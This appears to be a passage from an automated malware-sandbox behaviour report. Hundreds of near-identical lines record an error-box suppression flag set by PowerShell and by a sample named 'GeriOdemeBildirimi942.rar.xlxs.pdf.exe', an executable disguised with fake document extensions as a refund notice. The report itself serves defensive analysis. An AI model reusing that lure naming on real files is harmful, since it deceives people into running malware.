Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
